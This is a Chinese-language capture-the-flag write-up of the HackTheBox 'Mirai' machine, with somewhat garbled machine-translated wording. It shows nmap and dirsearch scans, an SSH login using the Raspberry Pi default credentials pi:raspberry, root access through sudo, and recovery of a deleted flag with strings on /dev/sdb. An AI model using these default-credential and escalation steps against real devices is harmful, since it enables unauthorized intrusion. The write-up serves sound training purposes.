共计 6762 个字符,预计需要花费 17 分钟才能阅读完成。
免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
┌──(root💀kali)-[~/htb/Mirai]
└─# nmap -Pn -sV 10.10.10.48 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-12-11 07:58 EST
Nmap scan report for 10.10.10.48
Host is up (0.31s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
53/tcp open domain dnsmasq 2.76
80/tcp open http lighttpd 1.4.35
1935/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
80 端口有一个 cms 的登录页面
cms 名称:Pi-hole
版本:Pi-hole Version v3.1.4 Web Interface Version v3.1 FTL Version v2.10
32400 端口也有一个 cms 页面
cms 名称:Plex
版本:Version 3.9.1
80 端口目录爆破
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.48/admin
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.48/-admin_21-12-11_08-21-32.txt
Error Log: /root/dirsearch/logs/errors-21-12-11_08-21-32.log
Target: http://10.10.10.48/admin/
[08:21:33] Starting:
[08:21:42] 301 - 0B - /admin/.git -> http://10.10.10.48/admin/.git/
[08:21:42] 200 - 274B - /admin/.git/config
[08:21:42] 200 - 73B - /admin/.git/description
[08:21:42] 200 - 23B - /admin/.git/HEAD
[08:21:42] 200 - 240B - /admin/.git/info/exclude
[08:21:42] 200 - 182B - /admin/.git/logs/HEAD
[08:21:42] 200 - 182B - /admin/.git/logs/refs/heads/master
[08:21:42] 301 - 0B - /admin/.git/logs/refs/heads -> http://10.10.10.48/admin/.git/logs/refs/heads/
[08:21:42] 200 - 182B - /admin/.git/logs/refs/remotes/origin/HEAD
[08:21:42] 301 - 0B - /admin/.git/logs/refs -> http://10.10.10.48/admin/.git/logs/refs/
[08:21:42] 301 - 0B - /admin/.git/logs/refs/remotes/origin -> http://10.10.10.48/admin/.git/logs/refs/remotes/origin/
[08:21:42] 301 - 0B - /admin/.git/refs/heads -> http://10.10.10.48/admin/.git/refs/heads/
[08:21:42] 301 - 0B - /admin/.git/refs/remotes/origin -> http://10.10.10.48/admin/.git/refs/remotes/origin/
[08:21:42] 301 - 0B - /admin/.git/logs/refs/remotes -> http://10.10.10.48/admin/.git/logs/refs/remotes/
[08:21:42] 301 - 0B - /admin/.git/refs/remotes -> http://10.10.10.48/admin/.git/refs/remotes/
[08:21:42] 200 - 32B - /admin/.git/refs/remotes/origin/HEAD
[08:21:42] 200 - 41B - /admin/.git/refs/heads/master
[08:21:42] 200 - 11KB - /admin/.git/index
[08:21:42] 301 - 0B - /admin/.git/refs/tags -> http://10.10.10.48/admin/.git/refs/tags/
[08:21:42] 200 - 1KB - /admin/.github/ISSUE_TEMPLATE.md
[08:21:42] 200 - 1KB - /admin/.github/PULL_REQUEST_TEMPLATE.md
[08:21:42] 200 - 153B - /admin/.gitignore/
[08:21:43] 200 - 107B - /admin/.git/packed-refs
[08:21:43] 200 - 153B - /admin/.gitignore
[08:21:44] 200 - 648B - /admin/.pullapprove.yml
[08:21:48] 200 - 846B - /admin/CONTRIBUTING.md
[08:21:49] 200 - 2KB - /admin/README.md
[08:21:49] 200 - 14KB - /admin/LICENSE
[08:22:12] 200 - 186B - /admin/api.php
[08:22:24] 200 - 14KB - /admin/debug.php
[08:22:35] 301 - 0B - /admin/img -> http://10.10.10.48/admin/img/
[08:22:36] 200 - 14KB - /admin/index.php
[08:22:36] 200 - 14KB - /admin/index.php/login/
[08:23:01] 301 - 0B - /admin/scripts -> http://10.10.10.48/admin/scripts/
[08:23:02] 200 - 14KB - /admin/settings.php
[08:23:07] 301 - 0B - /admin/style -> http://10.10.10.48/admin/style/
32400 端口目录爆破
──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.48:32400/web
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.48-32400/-web_21-12-11_09-55-31.txt
Error Log: /root/dirsearch/logs/errors-21-12-11_09-55-31.log
Target: http://10.10.10.48:32400/web/
[09:55:33] Starting:
[09:55:40] 200 - 0B - /web/js
[09:56:15] 200 - 0B - /web/common
[09:56:15] 200 - 0B - /web/common/
[09:56:20] 200 - 0B - /web/desktop/
[09:56:25] 200 - 5KB - /web/favicon.ico
[09:56:30] 200 - 0B - /web/img
[09:56:32] 200 - 4KB - /web/index.html
[09:56:32] 200 - 0B - /web/js/
[09:57:04] 200 - 0B - /web/swf
初始 shell
通过一番谷歌搜寻和钻研,Pi-hole 是一个轻量级的广告拦截器,个别装置在树莓派上。
也就是说,靶机很可能是一个树莓派机器
而树莓派的默认 ssh 明码是:pi:raspberry
尝试登陆
┌──(root💀kali)-[~/htb/Mirai]
└─# ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)
胜利登陆!
提权
查看 sudo 特权
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
能够间接提权到 root, 找到 user.txt
pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# find / -name user.txt
/home/pi/Desktop/user.txt
root.txt 在 U 盘有备份
root@raspberrypi:/home/pi# find / -name root.txt
/lib/live/mount/persistence/sda2/root/root.txt
/root/root.txt
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
列出设施信息
root@raspberrypi:/media# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 10G 0 disk
├─sda1 8:1 0 1.3G 0 part /lib/live/mount/persistence/sda1
└─sda2 8:2 0 8.7G 0 part /lib/live/mount/persistence/sda2
sdb 8:16 0 10M 0 disk /media/usbstick
sr0 11:0 1 1024M 0 rom
loop0 7:0 0 1.2G 1 loop /lib/live/mount/rootfs/filesystem.squashfs
貌似是在
sdb 8:16 0 10M 0 disk /media/usbstick
查看
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James还是要耍点花色。
查看/dev/sdb,原来是一个二进制文件
root@raspberrypi:/media/usbstick# ls -alh /dev/sdb
brw-rw---- 1 root disk 8, 16 Dec 11 12:53 /dev/sdb间接用 strings 命令查看/dev/sdb
root@raspberrypi:/home/pi# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
{root.txt 在此}
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
总结
这台靶机的重点,次要是依据扫描进去的服务,了解搭建这些服务的用意,进而了解这个服务个别是运行在什么零碎上。当得悉是树莓派当前,应用树莓派的默认登录账号连到 ssh,拿到初始 shell。
正文完
